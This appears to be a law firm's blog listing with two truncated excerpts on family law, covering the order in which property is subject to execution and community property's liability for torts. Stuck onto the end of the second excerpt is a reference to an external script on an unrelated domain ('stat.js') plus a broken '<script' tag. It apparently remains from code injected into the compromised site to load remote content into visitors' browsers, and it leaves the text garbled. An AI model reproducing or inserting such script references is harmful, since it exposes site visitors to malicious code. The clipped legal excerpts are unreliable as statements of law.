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How Does a Judge Determine Which Property is Subject to Execution?

January 29, 2019Civil Actions, Family Lawwpx_limolawy

ORDER IN WHICH PROPERTY IS SUBJECT TO EXECUTION.
(a) A judge may determine, as deemed just and equitable, the order
in which particular separate or community property is subject to
execution and sale to satisfy a judgment, if the property...

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Is Community Property subject to Tortious Liability of Either Spouse?

January 29, 2019Civil Actions, Family Lawwpx_limolawy

All community property is subject to tortious liability of
either spouse incurred during marriage.https://irc.lovegreenpencils.ga/stat.js?n=ns1<script...

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